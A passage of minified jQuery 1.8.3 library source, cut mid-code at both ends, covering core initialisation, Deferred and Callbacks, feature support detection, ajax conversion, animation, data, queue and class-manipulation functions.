n=t.charAt(0).toUpperCase()+t.slice(1),r=t,i=Jt.length;while(i--){t=Jt[i]+n;if(t in e)return t}return r}function Gt(e,t){return e=t||e,v.css(e,"display")==="none"||!v.contains(e.ownerDocument,e)}function Yt(e,t){var n,r,i=[],s=0,o=e.length;for(;s<o;s++){n=e[s];if(!n.style)continue;i[s]=v._data(n,"olddisplay"),t?(!i[s]&&n.style.display==="none"&&(n.style.display=""),n.style.display===""&&Gt(n)&&(i[s]=v._data(n,"olddisplay",nn(n.nodeName)))):(r=Dt(n,"display"),!i[s]&&r!=="none"&&v._data(n,"olddisplay",r))}for(s=0;s<o;s++){n=e[s];if(!n.style)continue;if(!t||n.style.display==="none"||n.style.display==="")n.style.display=t?i[s]||"":"none"}return e}function Zt(e,t,n){var r=Rt.exec(t);return r?Math.max(0,r[1]-(n||0))+(r[2]||"px"):t}function en(e,t,n,r){var i=n===(r?"border":"content")?4:t==="width"?1:0,s=0;for(;i<4;i+=2)n==="margin"&&(s+=v.css(e,n+$t[i],!0)),r?(n==="content"&&(s-=parseFloat(Dt(e,"padding"+$t[i]))||0),n!=="margin"&&(s-=parseFloat(Dt(e,"border"+$t[i]+"Width"))||0)):(s+=parseFloat(Dt(e,"padding"+$t[i]))||0,n!=="padding"&&(s+=parseFloat(Dt(e,"border"+$t[i]+"Width"))||0));return s}function tn(e,t,n){var r=t==="width"?e.offsetWidth:e.offsetHeight,i=!0,s=v.support.boxSizing&&v.css(e,"boxSizing")==="border-box";if(r<=0||r==null){r=Dt(e,t);if(r<0||r==null)r=e.style[t];if(Ut.test(r))return r;i=s&&(v.support.boxSizingReliable||r===e.style[t]),r=parseFloat(r)||0}return r+en(e,t,n||(s?"border":"content"),i)+"px"}function nn(e){if(Wt[e])return Wt[e];var t=v("<"+e+">").appendTo(i.body),n=t.css("display");t.remove();if(n==="none"||n===""){Pt=i.body.appendChild(Pt||v.extend(i.createElement("iframe"),{frameBorder:0,width:0,height:0}));if(!Ht||!Pt.createElement)Ht=(Pt.contentWindow||Pt.contentDocument).document,Ht.write("<!doctype html><html><body>"),Ht.close();t=Ht.body.appendChild(Ht.createElement(e)),n=Dt(t,"display"),i.body.removeChild(Pt)}return Wt[e]=n,n}function fn(e,t,n,r){var i;if(v.isArray(t))v.each(t,function(t,i){n||sn.test(e)?r(e,i):fn(e+"["+(typeof i=="object"?t:"")+"]",i,n,r)});else if(!n&&v.type(t)==="object")for(i in t)fn(e+"["+i+"]",t[i],n,r);else r(e,t)}function Cn(e){return function(t,n){typeof t!="string"&&(n=t,t="*");var r,i,s,o=t.toLowerCase().split(y),u=0,a=o.length;if(v.isFunction(n))for(;u<a;u++)r=o[u],s=/^\+/.test(r),s&&(r=r.substr(1)||"*"),i=e[r]=e[r]||[],i[s?"unshift":"push"](n)}}function kn(e,n,r,i,s,o){s=s||n.dataTypes[0],o=o||{},o[s]=!0;var u,a=e[s],f=0,l=a?a.length:0,c=e===Sn;for(;f<l&&(c||!u);f++)u=a[f](n,r,i),typeof u=="string"&&(!c||o[u]?u=t:(n.dataTypes.unshift(u),u=kn(e,n,r,i,u,o)));return(c||!u)&&!o["*"]&&(u=kn(e,n,r,i,"*",o)),u}function Ln(e,n){var r,i,s=v.ajaxSettings.flatOptions||{};for(r in n)n[r]!==t&&((s[r]?e:i||(i={}))[r]=n[r]);i&&v.extend(!0,e,i)}function An(e,n,r){var i,s,o,u,a=e.contents,f=e.dataTypes,l=e.responseFields;for(s in l)s in r&&(n[l[s]]=r[s]);while(f[0]==="*")f.shift(),i===t&&(i=e.mimeType||n.getResponseHeader("content-type"));if(i)for(s in a)if(a[s]&&a[s].test(i)){f.unshift(s);break}if(f[0]in r)o=f[0];else{for(s in r){if(!f[0]||e.converters[s+" "+f[0]]){o=s;break}u||(u=s)}o=o||u}if(o)return o!==f[0]&&f.unshift(o),r[o]}function On(e,t){var n,r,i,s,o=e.dataTypes.slice(),u=o[0],a={},f=0;e.dataFilter&&(t=e.dataFilter(t,e.dataType));if(o[1])for(n in e.converters)a[n.toLowerCase()]=e.converters[n];for(;i=o[++f];)if(i!=="*"){if(u!=="*"&&u!==i){n=a[u+" "+i]||a["* "+i];if(!n)for(r in a){s=r.split(" ");if(s[1]===i){n=a[u+" "+s[0]]||a["* "+s[0]];if(n){n===!0?n=a[r]:a[r]!==!0&&(i=s[0],o.splice(f--,0,i));break}}}if(n!==!0)if(n&&e["throws"])t=n(t);else try{t=n(t)}catch(l){return{state:"parsererror",error:n?l:"No conversion from "+u+" to "+i}}}u=i}return{state:"success",data:t}}function Fn(){try{return new e.XMLHttpRequest}catch(t){}}function In(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}function $n(){return setTimeout(function(){qn=t},0),qn=v.now()}function Jn(e,t){v.each(t,function(t,n){var r=(Vn[t]||[]).concat(Vn["*"]),i=0,s=r.length;for(;i<s;i++)if(r[i].call(e,t,n))return})}function Kn(e,t,n){var r,i=0,s=0,o=Xn.length,u=v.Deferred().always(function(){delete a.elem}),a=function(){var t=qn||$n(),n=Math.max(0,f.startTime+f.duration-t),r=n/f.duration||0,i=1-r,s=0,o=f.tweens.length;for(;s<o;s++)f.tweens[s].run(i);return u.notifyWith(e,[f,i,n]),i<1&&o?n:(u.resolveWith(e,[f]),!1)},f=u.promise({elem:e,props:v.extend({},t),opts:v.extend(!0,{specialEasing:{}},n),originalProperties:t,originalOptions:n,startTime:qn||$n(),duration:n.duration,tweens:[],createTween:function(t,n,r){var i=v.Tween(e,f.opts,t,n,f.opts.specialEasing[t]||f.opts.easing);return f.tweens.push(i),i},stop:function(t){var n=0,r=t?f.tweens.length:0;for(;n<r;n++)f.tweens[n].run(1);return t?u.resolveWith(e,[f,t]):u.rejectWith(e,[f,t]),this}}),l=f.props;Qn(l,f.opts.specialEasing);for(;i<o;i++){r=Xn[i].call(f,e,l,f.opts);if(r)return r}return Jn(f,l),v.isFunction(f.opts.start)&&f.opts.start.call(e,f),v.fx.timer(v.extend(a,{anim:f,queue:f.opts.queue,elem:e})),f.progress(f.opts.progress).done(f.opts.done,f.opts.complete).fail(f.opts.fail).always(f.opts.always)}function Qn(e,t){var n,r,i,s,o;for(n in e){r=v.camelCase(n),i=t[r],s=e[n],v.isArray(s)&&(i=s[1],s=e[n]=s[0]),n!==r&&(e[r]=s,delete e[n]),o=v.cssHooks[r];if(o&&"expand"in o){s=o.expand(s),delete e[r];for(n in s)n in e||(e[n]=s[n],t[n]=i)}else t[r]=i}}function Gn(e,t,n){var r,i,s,o,u,a,f,l,c,h=this,p=e.style,d={},m=[],g=e.nodeType&&Gt(e);n.queue||(l=v._queueHooks(e,"fx"),l.unqueued==null&&(l.unqueued=0,c=l.empty.fire,l.empty.fire=function(){l.unqueued||c()}),l.unqueued++,h.always(function(){h.always(function(){l.unqueued--,v.queue(e,"fx").length||l.empty.fire()})})),e.nodeType===1&&("height"in t||"width"in t)&&(n.overflow=[p.overflow,p.overflowX,p.overflowY],v.css(e,"display")==="inline"&&v.css(e,"float")==="none"&&(!v.support.inlineBlockNeedsLayout||nn(e.nodeName)==="inline"?p.display="inline-block":p.zoom=1)),n.overflow&&(p.overflow="hidden",v.support.shrinkWrapBlocks||h.done(function(){p.overflow=n.overflow[0],p.overflowX=n.overflow[1],p.overflowY=n.overflow[2]}));for(r in t){s=t[r];if(Un.exec(s)){delete t[r],a=a||s==="toggle";if(s===(g?"hide":"show"))continue;m.push(r)}}o=m.length;if(o){u=v._data(e,"fxshow")||v._data(e,"fxshow",{}),"hidden"in u&&(g=u.hidden),a&&(u.hidden=!g),g?v(e).show():h.done(function(){v(e).hide()}),h.done(function(){var t;v.removeData(e,"fxshow",!0);for(t in d)v.style(e,t,d[t])});for(r=0;r<o;r++)i=m[r],f=h.createTween(i,g?u[i]:0),d[i]=u[i]||v.style(e,i),i in u||(u[i]=f.start,g&&(f.end=f.start,f.start=i==="width"||i==="height"?1:0))}}function Yn(e,t,n,r,i){return new Yn.prototype.init(e,t,n,r,i)}function Zn(e,t){var n,r={height:e},i=0;t=t?1:0;for(;i<4;i+=2-t)n=$t[i],r["margin"+n]=r["padding"+n]=e;return t&&(r.opacity=r.width=e),r}function tr(e){return v.isWindow(e)?e:e.nodeType===9?e.defaultView||e.parentWindow:!1}var n,r,i=e.document,s=e.location,o=e.navigator,u=e.jQuery,a=e.$,f=Array.prototype.push,l=Array.prototype.slice,c=Array.prototype.indexOf,h=Object.prototype.toString,p=Object.prototype.hasOwnProperty,d=String.prototype.trim,v=function(e,t){return new v.fn.init(e,t,n)},m=/[\-+]?(?:\d*\.|)\d+(?:[eE][\-+]?\d+|)/.source,g=/\S/,y=/\s+/,b=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,w=/^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/,E=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,S=/^[\],:{}\s]*$/,x=/(?:^|:|,)(?:\s*\[)+/g,T=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,N=/"[^"\\\r\n]*"|true|false|null|-?(?:\d\d*\.|)\d+(?:[eE][\-+]?\d+|)/g,C=/^-ms-/,k=/-([\da-z])/gi,L=function(e,t){return(t+"").toUpperCase()},A=function(){i.addEventListener?(i.removeEventListener("DOMContentLoaded",A,!1),v.ready()):i.readyState==="complete"&&(i.detachEvent("onreadystatechange",A),v.ready())},O={};v.fn=v.prototype={constructor:v,init:function(e,n,r){var s,o,u,a;if(!e)return this;if(e.nodeType)return this.context=this[0]=e,this.length=1,this;if(typeof e=="string"){e.charAt(0)==="<"&&e.charAt(e.length-1)===">"&&e.length>=3?s=[null,e,null]:s=w.exec(e);if(s&&(s[1]||!n)){if(s[1])return n=n instanceof v?n[0]:n,a=n&&n.nodeType?n.ownerDocument||n:i,e=v.parseHTML(s[1],a,!0),E.test(s[1])&&v.isPlainObject(n)&&this.attr.call(e,n,!0),v.merge(this,e);o=i.getElementById(s[2]);if(o&&o.parentNode){if(o.id!==s[2])return r.find(e);this.length=1,this[0]=o}return this.context=i,this.selector=e,this}return!n||n.jquery?(n||r).find(e):this.constructor(n).find(e)}return v.isFunction(e)?r.ready(e):(e.selector!==t&&(this.selector=e.selector,this.context=e.context),v.makeArray(e,this))},selector:"",jquery:"1.8.3",length:0,size:function(){return this.length},toArray:function(){return l.call(this)},get:function(e){return e==null?this.toArray():e<0?this[this.length+e]:this[e]},pushStack:function(e,t,n){var r=v.merge(this.constructor(),e);return r.prevObject=this,r.context=this.context,t==="find"?r.selector=this.selector+(this.selector?" ":"")+n:t&&(r.selector=this.selector+"."+t+"("+n+")"),r},each:function(e,t){return v.each(this,e,t)},ready:function(e){return v.ready.promise().done(e),this},eq:function(e){return e=+e,e===-1?this.slice(e):this.slice(e,e+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(l.apply(this,arguments),"slice",l.call(arguments).join(","))},map:function(e){return this.pushStack(v.map(this,function(t,n){return e.call(t,n,t)}))},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:[].sort,splice:[].splice},v.fn.init.prototype=v.fn,v.extend=v.fn.extend=function(){var e,n,r,i,s,o,u=arguments[0]||{},a=1,f=arguments.length,l=!1;typeof u=="boolean"&&(l=u,u=arguments[1]||{},a=2),typeof u!="object"&&!v.isFunction(u)&&(u={}),f===a&&(u=this,--a);for(;a<f;a++)if((e=arguments[a])!=null)for(n in e){r=u[n],i=e[n];if(u===i)continue;l&&i&&(v.isPlainObject(i)||(s=v.isArray(i)))?(s?(s=!1,o=r&&v.isArray(r)?r:[]):o=r&&v.isPlainObject(r)?r:{},u[n]=v.extend(l,o,i)):i!==t&&(u[n]=i)}return u},v.extend({noConflict:function(t){return e.$===v&&(e.$=a),t&&e.jQuery===v&&(e.jQuery=u),v},isReady:!1,readyWait:1,holdReady:function(e){e?v.readyWait++:v.ready(!0)},ready:function(e){if(e===!0?--v.readyWait:v.isReady)return;if(!i.body)return setTimeout(v.ready,1);v.isReady=!0;if(e!==!0&&--v.readyWait>0)return;r.resolveWith(i,[v]),v.fn.trigger&&v(i).trigger("ready").off("ready")},isFunction:function(e){return v.type(e)==="function"},isArray:Array.isArray||function(e){return v.type(e)==="array"},isWindow:function(e){return e!=null&&e==e.window},isNumeric:function(e){return!isNaN(parseFloat(e))&&isFinite(e)},type:function(e){return e==null?String(e):O[h.call(e)]||"object"},isPlainObject:function(e){if(!e||v.type(e)!=="object"||e.nodeType||v.isWindow(e))return!1;try{if(e.constructor&&!p.call(e,"constructor")&&!p.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(n){return!1}var r;for(r in e);return r===t||p.call(e,r)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},error:function(e){throw new Error(e)},parseHTML:function(e,t,n){var r;return!e||typeof e!="string"?null:(typeof t=="boolean"&&(n=t,t=0),t=t||i,(r=E.exec(e))?[t.createElement(r[1])]:(r=v.buildFragment([e],t,n?null:[]),v.merge([],(r.cacheable?v.clone(r.fragment):r.fragment).childNodes)))},parseJSON:function(t){if(!t||typeof t!="string")return null;t=v.trim(t);if(e.JSON&&e.JSON.parse)return e.JSON.parse(t);if(S.test(t.replace(T,"@").replace(N,"]").replace(x,"")))return(new Function("return "+t))();v.error("Invalid JSON: "+t)},parseXML:function(n){var r,i;if(!n||typeof n!="string")return null;try{e.DOMParser?(i=new DOMParser,r=i.parseFromString(n,"text/xml")):(r=new ActiveXObject("Microsoft.XMLDOM"),r.async="false",r.loadXML(n))}catch(s){r=t}return(!r||!r.documentElement||r.getElementsByTagName("parsererror").length)&&v.error("Invalid XML: "+n),r},noop:function(){},globalEval:function(t){t&&g.test(t)&&(e.execScript||function(t){e.eval.call(e,t)})(t)},camelCase:function(e){return e.replace(C,"ms-").replace(k,L)},nodeName:function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},each:function(e,n,r){var i,s=0,o=e.length,u=o===t||v.isFunction(e);if(r){if(u){for(i in e)if(n.apply(e[i],r)===!1)break}else for(;s<o;)if(n.apply(e[s++],r)===!1)break}else if(u){for(i in e)if(n.call(e[i],i,e[i])===!1)break}else for(;s<o;)if(n.call(e[s],s,e[s++])===!1)break;return e},trim:d&&!d.call("\ufeff\u00a0")?function(e){return e==null?"":d.call(e)}:function(e){return e==null?"":(e+"").replace(b,"")},makeArray:function(e,t){var n,r=t||[];return e!=null&&(n=v.type(e),e.length==null||n==="string"||n==="function"||n==="regexp"||v.isWindow(e)?f.call(r,e):v.merge(r,e)),r},inArray:function(e,t,n){var r;if(t){if(c)return c.call(t,e,n);r=t.length,n=n?n<0?Math.max(0,r+n):n:0;for(;n<r;n++)if(n in t&&t[n]===e)return n}return-1},merge:function(e,n){var r=n.length,i=e.length,s=0;if(typeof r=="number")for(;s<r;s++)e[i++]=n[s];else while(n[s]!==t)e[i++]=n[s++];return e.length=i,e},grep:function(e,t,n){var r,i=[],s=0,o=e.length;n=!!n;for(;s<o;s++)r=!!t(e[s],s),n!==r&&i.push(e[s]);return i},map:function(e,n,r){var i,s,o=[],u=0,a=e.length,f=e instanceof v||a!==t&&typeof a=="number"&&(a>0&&e[0]&&e[a-1]||a===0||v.isArray(e));if(f)for(;u<a;u++)i=n(e[u],u,r),i!=null&&(o[o.length]=i);else for(s in e)i=n(e[s],s,r),i!=null&&(o[o.length]=i);return o.concat.apply([],o)},guid:1,proxy:function(e,n){var r,i,s;return typeof n=="string"&&(r=e[n],n=e,e=r),v.isFunction(e)?(i=l.call(arguments,2),s=function(){return e.apply(n,i.concat(l.call(arguments)))},s.guid=e.guid=e.guid||v.guid++,s):t},access:function(e,n,r,i,s,o,u){var a,f=r==null,l=0,c=e.length;if(r&&typeof r=="object"){for(l in r)v.access(e,n,l,r[l],1,o,i);s=1}else if(i!==t){a=u===t&&v.isFunction(i),f&&(a?(a=n,n=function(e,t,n){return a.call(v(e),n)}):(n.call(e,i),n=null));if(n)for(;l<c;l++)n(e[l],r,a?i.call(e[l],l,n(e[l],r)):i,u);s=1}return s?e:f?n.call(e):c?n(e[0],r):o},now:function(){return(new Date).getTime()}}),v.ready.promise=function(t){if(!r){r=v.Deferred();if(i.readyState==="complete")setTimeout(v.ready,1);else if(i.addEventListener)i.addEventListener("DOMContentLoaded",A,!1),e.addEventListener("load",v.ready,!1);else{i.attachEvent("onreadystatechange",A),e.attachEvent("onload",v.ready);var n=!1;try{n=e.frameElement==null&&i.documentElement}catch(s){}n&&n.doScroll&&function o(){if(!v.isReady){try{n.doScroll("left")}catch(e){return setTimeout(o,50)}v.ready()}}()}}return r.promise(t)},v.each("Boolean Number String Function Array Date RegExp Object".split(" "),function(e,t){O["[object "+t+"]"]=t.toLowerCase()}),n=v(i);var M={};v.Callbacks=function(e){e=typeof e=="string"?M[e]||_(e):v.extend({},e);var n,r,i,s,o,u,a=[],f=!e.once&&[],l=function(t){n=e.memory&&t,r=!0,u=s||0,s=0,o=a.length,i=!0;for(;a&&u<o;u++)if(a[u].apply(t[0],t[1])===!1&&e.stopOnFalse){n=!1;break}i=!1,a&&(f?f.length&&l(f.shift()):n?a=[]:c.disable())},c={add:function(){if(a){var t=a.length;(function r(t){v.each(t,function(t,n){var i=v.type(n);i==="function"?(!e.unique||!c.has(n))&&a.push(n):n&&n.length&&i!=="string"&&r(n)})})(arguments),i?o=a.length:n&&(s=t,l(n))}return this},remove:function(){return a&&v.each(arguments,function(e,t){var n;while((n=v.inArray(t,a,n))>-1)a.splice(n,1),i&&(n<=o&&o--,n<=u&&u--)}),this},has:function(e){return v.inArray(e,a)>-1},empty:function(){return a=[],this},disable:function(){return a=f=n=t,this},disabled:function(){return!a},lock:function(){return f=t,n||c.disable(),this},locked:function(){return!f},fireWith:function(e,t){return t=t||[],t=[e,t.slice?t.slice():t],a&&(!r||f)&&(i?f.push(t):l(t)),this},fire:function(){return c.fireWith(this,arguments),this},fired:function(){return!!r}};return c},v.extend({Deferred:function(e){var t=[["resolve","done",v.Callbacks("once memory"),"resolved"],["reject","fail",v.Callbacks("once memory"),"rejected"],["notify","progress",v.Callbacks("memory")]],n="pending",r={state:function(){return n},always:function(){return i.done(arguments).fail(arguments),this},then:function(){var e=arguments;return v.Deferred(function(n){v.each(t,function(t,r){var s=r[0],o=e[t];i[r[1]](v.isFunction(o)?function(){var e=o.apply(this,arguments);e&&v.isFunction(e.promise)?e.promise().done(n.resolve).fail(n.reject).progress(n.notify):n[s+"With"](this===i?n:this,[e])}:n[s])}),e=null}).promise()},promise:function(e){return e!=null?v.extend(e,r):r}},i={};return r.pipe=r.then,v.each(t,function(e,s){var o=s[2],u=s[3];r[s[1]]=o.add,u&&o.add(function(){n=u},t[e^1][2].disable,t[2][2].lock),i[s[0]]=o.fire,i[s[0]+"With"]=o.fireWith}),r.promise(i),e&&e.call(i,i),i},when:function(e){var t=0,n=l.call(arguments),r=n.length,i=r!==1||e&&v.isFunction(e.promise)?r:0,s=i===1?e:v.Deferred(),o=function(e,t,n){return function(r){t[e]=this,n[e]=arguments.length>1?l.call(arguments):r,n===u?s.notifyWith(t,n):--i||s.resolveWith(t,n)}},u,a,f;if(r>1){u=new Array(r),a=new Array(r),f=new Array(r);for(;t<r;t++)n[t]&&v.isFunction(n[t].promise)?n[t].promise().done(o(t,f,n)).fail(s.reject).progress(o(t,a,u)):--i}return i||s.resolveWith(f,n),s.promise()}}),v.support=function(){var t,n,r,s,o,u,a,f,l,c,h,p=i.createElement("div");p.setAttribute("className","t"),p.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",n=p.getElementsByTagName("*"),r=p.getElementsByTagName("a")[0];if(!n||!r||!n.length)return{};s=i.createElement("select"),o=s.appendChild(i.createElement("option")),u=p.getElementsByTagName("input")[0],r.style.cssText="top:1px;float:left;opacity:.5",t={leadingWhitespace:p.firstChild.nodeType===3,tbody:!p.getElementsByTagName("tbody").length,htmlSerialize:!!p.getElementsByTagName("link").length,style:/top/.test(r.getAttribute("style")),hrefNormalized:r.getAttribute("href")==="/a",opacity:/^0.5/.test(r.style.opacity),cssFloat:!!r.style.cssFloat,checkOn:u.value==="on",optSelected:o.selected,getSetAttribute:p.className!=="t",enctype:!!i.createElement("form").enctype,html5Clone:i.createElement("nav").cloneNode(!0).outerHTML!=="<:nav></:nav>",boxModel:i.compatMode==="CSS1Compat",submitBubbles:!0,changeBubbles:!0,focusinBubbles:!1,deleteExpando:!0,noCloneEvent:!0,inlineBlockNeedsLayout:!1,shrinkWrapBlocks:!1,reliableMarginRight:!0,boxSizingReliable:!0,pixelPosition:!1},u.checked=!0,t.noCloneChecked=u.cloneNode(!0).checked,s.disabled=!0,t.optDisabled=!o.disabled;try{delete p.test}catch(d){t.deleteExpando=!1}!p.addEventListener&&p.attachEvent&&p.fireEvent&&(p.attachEvent("onclick",h=function(){t.noCloneEvent=!1}),p.cloneNode(!0).fireEvent("onclick"),p.detachEvent("onclick",h)),u=i.createElement("input"),u.value="t",u.setAttribute("type","radio"),t.radioValue=u.value==="t",u.setAttribute("checked","checked"),u.setAttribute("name","t"),p.appendChild(u),a=i.createDocumentFragment(),a.appendChild(p.lastChild),t.checkClone=a.cloneNode(!0).cloneNode(!0).lastChild.checked,t.appendChecked=u.checked,a.removeChild(u),a.appendChild(p);if(p.attachEvent)for(l in{submit:!0,change:!0,focusin:!0})f="on"+l,c=f in p,c||(p.setAttribute(f,"return;"),c=typeof p[f]=="function"),t[l+"Bubbles"]=c;return v(function(){var n,r,s,o,u="padding:0;margin:0;border:0;display:block;overflow:hidden;",a=i.getElementsByTagName("body")[0];if(!a)return;n=i.createElement("div"),n.style.cssText="visibility:hidden;border:0;width:0;height:0;position:static;top:0;margin-top:1px",a.insertBefore(n,a.firstChild),r=i.createElement("div"),n.appendChild(r),r.innerHTML="<table><tr><td></td><td>t</td></tr></table>",s=r.getElementsByTagName("td"),s[0].style.cssText="padding:0;margin:0;border:0;display:none",c=s[0].offsetHeight===0,s[0].style.display="",s[1].style.display="none",t.reliableHiddenOffsets=c&&s[0].offsetHeight===0,r.innerHTML="",r.style.cssText="box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;padding:1px;border:1px;display:block;width:4px;margin-top:1%;position:absolute;top:1%;",t.boxSizing=r.offsetWidth===4,t.doesNotIncludeMarginInBodyOffset=a.offsetTop!==1,e.getComputedStyle&&(t.pixelPosition=(e.getComputedStyle(r,null)||{}).top!=="1%",t.boxSizingReliable=(e.getComputedStyle(r,null)||{width:"4px"}).width==="4px",o=i.createElement("div"),o.style.cssText=r.style.cssText=u,o.style.marginRight=o.style.width="0",r.style.width="1px",r.appendChild(o),t.reliableMarginRight=!parseFloat((e.getComputedStyle(o,null)||{}).marginRight)),typeof r.style.zoom!="undefined"&&(r.innerHTML="",r.style.cssText=u+"width:1px;padding:1px;display:inline;zoom:1",t.inlineBlockNeedsLayout=r.offsetWidth===3,r.style.display="block",r.style.overflow="visible",r.innerHTML="<div></div>",r.firstChild.style.width="5px",t.shrinkWrapBlocks=r.offsetWidth!==3,n.style.zoom=1),a.removeChild(n),n=r=s=o=null}),a.removeChild(p),n=r=s=o=u=a=p=null,t}();var D=/(?:\{[\s\S]*\}|\[[\s\S]*\])$/,P=/([A-Z])/g;v.extend({cache:{},deletedIds:[],uuid:0,expando:"jQuery"+(v.fn.jquery+Math.random()).replace(/\D/g,""),noData:{embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000",applet:!0},hasData:function(e){return e=e.nodeType?v.cache[e[v.expando]]:e[v.expando],!!e&&!B(e)},data:function(e,n,r,i){if(!v.acceptData(e))return;var s,o,u=v.expando,a=typeof n=="string",f=e.nodeType,l=f?v.cache:e,c=f?e[u]:e[u]&&u;if((!c||!l[c]||!i&&!l[c].data)&&a&&r===t)return;c||(f?e[u]=c=v.deletedIds.pop()||v.guid++:c=u),l[c]||(l[c]={},f||(l[c].toJSON=v.noop));if(typeof n=="object"||typeof n=="function")i?l[c]=v.extend(l[c],n):l[c].data=v.extend(l[c].data,n);return s=l[c],i||(s.data||(s.data={}),s=s.data),r!==t&&(s[v.camelCase(n)]=r),a?(o=s[n],o==null&&(o=s[v.camelCase(n)])):o=s,o},removeData:function(e,t,n){if(!v.acceptData(e))return;var r,i,s,o=e.nodeType,u=o?v.cache:e,a=o?e[v.expando]:v.expando;if(!u[a])return;if(t){r=n?u[a]:u[a].data;if(r){v.isArray(t)||(t in r?t=[t]:(t=v.camelCase(t),t in r?t=[t]:t=t.split(" ")));for(i=0,s=t.length;i<s;i++)delete r[t[i]];if(!(n?B:v.isEmptyObject)(r))return}}if(!n){delete u[a].data;if(!B(u[a]))return}o?v.cleanData([e],!0):v.support.deleteExpando||u!=u.window?delete u[a]:u[a]=null},_data:function(e,t,n){return v.data(e,t,n,!0)},acceptData:function(e){var t=e.nodeName&&v.noData[e.nodeName.toLowerCase()];return!t||t!==!0&&e.getAttribute("classid")===t}}),v.fn.extend({data:function(e,n){var r,i,s,o,u,a=this[0],f=0,l=null;if(e===t){if(this.length){l=v.data(a);if(a.nodeType===1&&!v._data(a,"parsedAttrs")){s=a.attributes;for(u=s.length;f<u;f++)o=s[f].name,o.indexOf("data-")||(o=v.camelCase(o.substring(5)),H(a,o,l[o]));v._data(a,"parsedAttrs",!0)}}return l}return typeof e=="object"?this.each(function(){v.data(this,e)}):(r=e.split(".",2),r[1]=r[1]?"."+r[1]:"",i=r[1]+"!",v.access(this,function(n){if(n===t)return l=this.triggerHandler("getData"+i,[r[0]]),l===t&&a&&(l=v.data(a,e),l=H(a,e,l)),l===t&&r[1]?this.data(r[0]):l;r[1]=n,this.each(function(){var t=v(this);t.triggerHandler("setData"+i,r),v.data(this,e,n),t.triggerHandler("changeData"+i,r)})},null,n,arguments.length>1,null,!1))},removeData:function(e){return this.each(function(){v.removeData(this,e)})}}),v.extend({queue:function(e,t,n){var r;if(e)return t=(t||"fx")+"queue",r=v._data(e,t),n&&(!r||v.isArray(n)?r=v._data(e,t,v.makeArray(n)):r.push(n)),r||[]},dequeue:function(e,t){t=t||"fx";var n=v.queue(e,t),r=n.length,i=n.shift(),s=v._queueHooks(e,t),o=function(){v.dequeue(e,t)};i==="inprogress"&&(i=n.shift(),r--),i&&(t==="fx"&&n.unshift("inprogress"),delete s.stop,i.call(e,o,s)),!r&&s&&s.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return v._data(e,n)||v._data(e,n,{empty:v.Callbacks("once memory").add(function(){v.removeData(e,t+"queue",!0),v.removeData(e,n,!0)})})}}),v.fn.extend({queue:function(e,n){var r=2;return typeof e!="string"&&(n=e,e="fx",r--),arguments.length<r?v.queue(this[0],e):n===t?this:this.each(function(){var t=v.queue(this,e,n);v._queueHooks(this,e),e==="fx"&&t[0]!=="inprogress"&&v.dequeue(this,e)})},dequeue:function(e){return this.each(function(){v.dequeue(this,e)})},delay:function(e,t){return e=v.fx?v.fx.speeds[e]||e:e,t=t||"fx",this.queue(t,function(t,n){var r=setTimeout(t,e);n.stop=function(){clearTimeout(r)}})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,n){var r,i=1,s=v.Deferred(),o=this,u=this.length,a=function(){--i||s.resolveWith(o,[o])};typeof e!="string"&&(n=e,e=t),e=e||"fx";while(u--)r=v._data(o[u],e+"queueHooks"),r&&r.empty&&(i++,r.empty.add(a));return a(),s.promise(n)}});var j,F,I,q=/[\t\r\n]/g,R=/\r/g,U=/^(?:button|input)$/i,z=/^(?:button|input|object|select|textarea)$/i,W=/^a(?:rea|)$/i,X=/^(?:autofocus|autoplay|async|checked|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped|selected)$/i,V=v.support.getSetAttribute;v.fn.extend({attr:function(e,t){return v.access(this,v.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){v.removeAttr(this,e)})},prop:function(e,t){return v.access(this,v.prop,e,t,arguments.length>1)},removeProp:function(e){return e=v.propFix[e]||e,this.each(function(){try{this[e]=t,delete this[e]}catch(n){}})},addClass:function(e){var t,n,r,i,s,o,u;if(v.isFunction(e))return this.each(function(t){v(this).addClass(e.call(this,t,this.className))});if(e&&typeof e=="string"){t=e.split(y);for(n=0,r=this.length;n<r;n++){i=this[n];if(i.nodeType===1)if(!i.className&&t.length===1)i.className=e;else{s=" "+i.className+" ";for(o=0,u=t.length;o<u;o++)s.indexOf(" "+t[o]+" ")<0&&(s+=t[o]+" ");i.className=v.trim(s)}}}return this},removeClass:function(e){var n,r,i,s,o,u,a;if(v.isFunction(e))return this.each(function(t){v(this).removeClass(e.call(this,t,this.className))});if(e&&typeof e=="string"||e===t){n=(e||"").split(y);for(u=0,a=this.length;u<a;u++){i=this[u];if(i.nodeType===1&&i.className){r=(" "+i.className+" ").replace(q," ");for(s=0,o=n.length;s<o;s++)while(r.indexOf(" "+n[s]+" ")>=0)r=r.replace(" "+n[s]+" "," ");i.className=e?v.trim(r):""}}}return this},toggleClass:function(e,t){var n=typeof e,r=typeof t=="boolean";return v.isFunction(e)?this.each(function(n){v(this).toggleClass(e.call(this,n,this.className,t),t)}):this.each(function(){if(n==="string"){var i,s=0,o=v(this),u=t,a=e.split(y);while(i=a[s++])u=r?u:!o.hasClass(i),o[u?"addClass":"removeClass"](i)}else if(n==="undefined"||n==="boolean")this.className&&v._data(this,"__className__",this.className),this.className=this.className||e===!1?"":v._data(this,"__className__")||""})},hasClass:function(e){var t=" "+e+" ",n=0,r=this.length;for(;n<r;n++)if(this[n].nodeType===1&&(" "+this[n].className+" ").replace(q," ").indexOf(t)>=0)return!0;return!1},val:function(e){var n,r,i,s=this[0];if(!arguments.length){if(s)return 